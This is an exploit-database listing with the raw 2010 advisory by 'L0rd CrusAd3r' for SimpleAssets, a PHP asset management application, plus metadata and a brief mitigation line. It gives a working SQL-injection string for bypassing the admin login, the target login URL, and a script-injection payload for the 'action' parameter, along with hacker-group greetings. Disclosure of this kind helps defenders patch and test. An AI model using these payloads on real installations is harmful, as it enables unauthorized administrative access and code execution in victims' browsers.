SimpleAssets Authentication Bypass & XSS Vulnerability

vendor:

SimpleAssets

by:

L0rd CrusAd3r

8,8

CVSS

HIGH

Authentication Bypass & XSS

287

CWE

Product Name: SimpleAssets

Affected Version From: n/a

Affected Version To: n/a

Patch Exists: NO

Related CWE: N/A

CPE: a:simpleassets:simpleassets

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: PHP 4.0

2010

SimpleAssets Authentication Bypass & XSS Vulnerability

SimpleAssets is a web based asset management system to track assets, employees, software licenses, ip addresses and asset sign in and sign out. An authentication bypass vulnerability was found in the Admin Login page, where the string a' or '1'='1 can be used for Username and Password to gain access. An XSS vulnerability was also found, where a malicious script can be injected in the parameter '"--><script>alert(0x000872)</script> to execute arbitrary code.

Mitigation:

Ensure that authentication credentials are properly validated and that user input is properly sanitized to prevent XSS attacks.

Source

Exploit-DB raw data:

1               ##########################################             1
0               I'm L0rd CrusAd3r member from Inj3ct0r Team            1
1               ##########################################             0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
Exploit Title:SimpleAssets Authentication Bypass & XSS Vulnerability 
Vendor url:http://simpleassets.sourceforge.net/
Version:n/a	
Price:n/a
Published: 2010-06-21
Greetz to:r0073r (inj3ct0r.com), Sid3^effects, MaYur, MA1201, Sonic Bluehat.
Special Greetz: Topsecure.net, inj3ct0r Team
Shoutzz:- To all ICW members

~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~
Description:

SimpleAssets is a web based asset management system to track assets, employees, software licenses, ip addresses and asset sign in and sign out. Supports importing from existing DB's. An online demo is available to try before you download. (PHP/MySQL) Code: PHP 4.0 

~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~

Vulnerability:

*Authentication Bypass found
 
The Provided Script as Sqli Vulnerability in Admin Login page
 
DEMO URL : http://server/simpleassets/index.php?action=login&lastaction=&lastkey=&loginout=2
 
Use the string a' or '1'='1 for Username and Password to gain access.



*XSS Vulnerability

Parameter: '"--><script>alert(0x000872)</script>

Demo URL:-http://server/simpleassets/index.php?action=[xss]
 

# 0day n0 m0re #
# L0rd CrusAd3r #